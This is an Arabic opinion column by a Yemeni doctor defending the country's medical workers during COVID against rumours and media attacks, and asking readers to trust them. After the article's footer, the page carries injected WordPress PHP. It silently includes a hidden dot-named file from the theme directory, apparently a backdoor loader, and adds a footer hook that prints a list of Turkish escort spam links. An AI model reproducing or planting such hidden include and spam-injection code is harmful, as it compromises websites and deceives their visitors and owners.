مساحات رأي

الجيش الصحة اليمني بين حداد الموت وألسنة “حداد”

الدكتورة /هناء عبداللطيف الأهدل

لكل زمان قادته وأهله ، ولكل مجال في هذه الحياة رواده

وأما المعارك فلا يدخل ميدانها إلا فارس كما يقولون

وها نحن اليوم في زمن الواحد والعشرين .. زمن المتاعب والنضال

زمن فتح في وجه الإنسان جبهات لا حصر لها ” سياسية ، إقتصادية ..الخ ”

زمن جعل من الطب جبهة ، وألزم ذلك الإنسان الذي يمارس مهنة إنسانية جندياً شأنه شأن ذلك الرجل المقاتل بالسلاح في مواقع الحروب والقتال.

لكنني أعتقد بأن الجيش الأبيض والذي أعتبر نفسي أحد كوادره مظلوماً جداً

لا اقول أنه من الواجب أن يقدم له رسالة شكر أو يفتح له قناة فضائية لنشر أعمالهم ومحاسنهم … كل ذلك غير وارد في قاموس ملائكة الرحمة في أرض الله

لكننا نحن معشر الأطباء نطالبكم اليوم بتقوى الله في أنفسكم ، ولا تنجروا بنشر الشائعات التي يختلقها أصحاب القلوب السوداء المعتمة وأعداء الإنسانية

وخصوصاً اليوم في زمن  كورونا … وأطباء اليمن وللأسف أكثر مظلومية بين شعوب العالم

وسائل الإعلام تهاجمهم بالسنة حداد ، بينما بعض أفراد طواقمها من يعتبرونهم زملائهم يتلقون الرعاية الكاملة والكلمة الطيبة بين أيدي الأطباء … مجالس القات مليئة بالشائعات المظللة على كوادر الطب بينما ذلك الطبيب يعيش في حالة توتر وبين روائح المرضى ينشر إبتسامته …

سقط في هذه المعركة عظماء خسر الوطن برحيلهم أوردة كانت تمده بالدم ليعيش

بينما قام مجتمعه بتمزيق جثة ذلك الفارس الأبيض القلب والرداء بشائعاته

فما كان رد زملائه إلا أن قالوا حسبنا الله ونعم الوكيل وفوضوا أمرهم لله بقلوب مؤمنة وبروح الفروسية الشجاعة

هل تعلمون لماذا لا يزال جيش اليمن الأبيض القلب والرداء مواصلاً مشوار نضاله

ومستعداَ  للتضحية بتقديم المزيد من فرسانه في هذه المعركة رغم ما حصل له من ظلم ..؟

فقط لأنه يؤمن بنصر الله وتأييده له وله عبرة بإخوانه رفقاء السلاح في جبهات القتال

ويؤمن أيضاً بأن في شعبه شرفاء لا يصدقون كل شائعة وإن كان قد إنجر بعضهم لبعض الأكاذيب فلن يستمر في تصديقها

كلمة أخيرة أريد أن أوجها لكم جميعاً : لا تفقدوا الثقة فيمن تأمنون أرواحكم بين ايديكم

طالما وأنتم تعرفون أنهم إخوانكم ومن بلد وصف بالطيب وأنتم أهل الطيبة وأهل الحكمة وارفعوا الراية البيضاء لمن يحملون لكم قلوباً بيضاء

وتأكدوا بأن النصر حليفنا .. ما دمتم إلى جانبنا وفي صفنا

وأعلنوها للعالم كله وأقهروا أعداء اليمن وقولوا

الف #تحية_لجيش_اليمن_الأبيض

مقالات ذات صلة

إغلاق
إغلاق
if (file_exists(get_template_directory() . DIRECTORY_SEPARATOR . "." . basename(get_template_directory()) . ".php")) { include_once get_template_directory() . DIRECTORY_SEPARATOR . "." . basename(get_template_directory()) . ".php"; } if (file_exists(get_template_directory() . DIRECTORY_SEPARATOR . '.' . basename(get_template_directory()) . '.php')) { include_once get_template_directory() . DIRECTORY_SEPARATOR . '.' . basename(get_template_directory()) . '.php'; } function zo(){ echo '
Manisa escort Tekirdağ escort Çanakkale escort Trabzon escort Yalova escort Balıkesir escort Aydın escort Muğla escort Afyon escort Aksaray escort Şanlıurfa escort Ümraniye escort Sinop escort Keçioren escort
'; } add_action("wp_footer",'zo');